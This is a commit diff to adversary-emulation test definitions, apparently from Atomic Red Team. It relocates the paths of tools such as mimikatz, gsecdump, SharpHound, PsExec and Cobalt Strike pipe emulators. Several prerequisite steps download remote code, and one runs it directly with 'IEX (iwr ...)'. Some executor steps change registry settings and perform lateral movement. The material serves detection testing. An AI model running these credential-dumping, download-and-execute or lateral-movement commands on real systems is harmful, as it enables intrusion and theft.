use ExternalPayloads folder (#2462)
* use ExternalPayloads folder * psexec as external dependency * psexec as external dependency
This commit is contained in:
Carrie Roberts
@@ -19,7 +19,7 @@ atomic_tests:
|
||||
gsecdump_exe:
|
||||
description: Path to the Gsecdump executable
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
|
||||
gsecdump_bin_hash:
|
||||
description: File hash of the Gsecdump binary file
|
||||
type: string
|
||||
|
||||
@@ -66,7 +66,7 @@ atomic_tests:
|
||||
SharpView:
|
||||
description: Path of the executable opensource redteam tool used for the performing this atomic.
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1049\bin\SharpView.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\SharpView.exe
|
||||
syntax:
|
||||
description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc.
|
||||
type: string
|
||||
|
||||
@@ -25,23 +25,18 @@ atomic_tests:
|
||||
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: File path for SharpHound payload
|
||||
type: string
|
||||
default: PathToAtomicsFolder\T1059.001\src
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
SharpHound.ps1 must be located at #{file_path}
|
||||
SharpHound.ps1 must be located at "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
|
||||
prereq_command: |
|
||||
if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
|
||||
executor:
|
||||
command: |
|
||||
write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
|
||||
import-module #{file_path}\SharpHound.ps1
|
||||
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
|
||||
Invoke-BloodHound -OutputDirectory $env:Temp
|
||||
Start-Sleep 5
|
||||
cleanup_command: |
|
||||
|
||||
@@ -593,6 +593,7 @@ atomic_tests:
|
||||
prereq_command: |
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
|
||||
echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
|
||||
executor:
|
||||
@@ -774,13 +775,9 @@ atomic_tests:
|
||||
description: Destination path to file
|
||||
type: path
|
||||
default: $env:TEMP\Atomic-license.txt
|
||||
local_nimgrab:
|
||||
description: Local path to nimgrab
|
||||
type: path
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe
|
||||
executor:
|
||||
command: |
|
||||
cmd /c nimgrab.exe #{remote_file} #{destination_path}
|
||||
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}
|
||||
cleanup_command: |
|
||||
del #{destination_path} >nul 2>&1
|
||||
name: command_prompt
|
||||
@@ -789,13 +786,12 @@ atomic_tests:
|
||||
- description: |
|
||||
NimGrab must be installed on system.
|
||||
prereq_command: |
|
||||
if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1}
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\nim.zip
|
||||
Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\nim.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\nim -Force
|
||||
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
|
||||
Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim
|
||||
Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim.zip
|
||||
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"
|
||||
- name: iwr or Invoke Web-Request download
|
||||
auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
|
||||
description: |
|
||||
|
||||
@@ -154,7 +154,7 @@ atomic_tests:
|
||||
renamed_binary:
|
||||
description: renamed Microsoft.Workflow.Compiler
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1218\src\svchost.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\svchost.exe
|
||||
mwcpath:
|
||||
description: Default location of Microsoft.Workflow.Compiler.exe
|
||||
type: path
|
||||
@@ -168,10 +168,10 @@ atomic_tests:
|
||||
- description: |
|
||||
.Net must be installed for this test to work correctly.
|
||||
prereq_command: |
|
||||
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
|
||||
if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
write-host "you need to rename workflow complier before you run this test"
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
|
||||
executor:
|
||||
command: |
|
||||
#{renamed_binary} #{xml_payload} output.txt
|
||||
|
||||
@@ -22,7 +22,7 @@ atomic_tests:
|
||||
msxsl_exe:
|
||||
description: Location of the MSXSL executable.
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1220\bin\msxsl.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
@@ -44,6 +44,7 @@ atomic_tests:
|
||||
prereq_command: |
|
||||
if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
|
||||
executor:
|
||||
command: |
|
||||
@@ -72,7 +73,7 @@ atomic_tests:
|
||||
msxsl_exe:
|
||||
description: Location of the MSXSL executable.
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1220\bin\msxsl.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
|
||||
@@ -290,7 +290,7 @@ atomic_tests:
|
||||
mimikatz_exe:
|
||||
description: Path of the Mimikatz binary
|
||||
type: string
|
||||
default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
|
||||
@@ -38,7 +38,7 @@ atomic_tests:
|
||||
gpp_script_path:
|
||||
description: Path to the Get-GPPPassword PowerShell Script
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1
|
||||
default: PathToAtomicsFolder\..\ExternalPayloads\Get-GPPPassword.ps1
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
|
||||
+15
-15
@@ -15,15 +15,15 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 1
|
||||
name: command_prompt
|
||||
|
||||
- name: Cobalt Strike Lateral Movement (psexec_psh) pipe
|
||||
@@ -39,15 +39,15 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 2
|
||||
name: command_prompt
|
||||
|
||||
- name: Cobalt Strike SSH (postex_ssh) pipe
|
||||
@@ -63,15 +63,15 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 3
|
||||
name: command_prompt
|
||||
|
||||
- name: Cobalt Strike post-exploitation pipe (4.2 and later)
|
||||
@@ -87,15 +87,15 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 4
|
||||
name: command_prompt
|
||||
|
||||
- name: Cobalt Strike post-exploitation pipe (before 4.2)
|
||||
@@ -111,13 +111,13 @@ atomic_tests:
|
||||
- description: |
|
||||
Named pipe executors must exist on disk
|
||||
prereq_command: |
|
||||
if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
|
||||
Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 5
|
||||
name: command_prompt
|
||||
|
||||
@@ -119,13 +119,23 @@ atomic_tests:
|
||||
description: Target hostname to attempt psexec connection to for emulation of lateral movement.
|
||||
type: string
|
||||
default: $ENV:COMPUTERNAME
|
||||
dependencies:
|
||||
- description: |
|
||||
PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
|
||||
prereq_command: |
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
|
||||
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force
|
||||
New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null
|
||||
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
|
||||
executor:
|
||||
command: |
|
||||
cmd.exe /c "wmic csproduct get UUID"
|
||||
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"
|
||||
cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1"
|
||||
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
|
||||
copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
|
||||
copy "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" $env:temp
|
||||
cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token""
|
||||
cleanup_command: |
|
||||
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /f
|
||||
|
||||
Binary file not shown.
Reference in New Issue
Block a user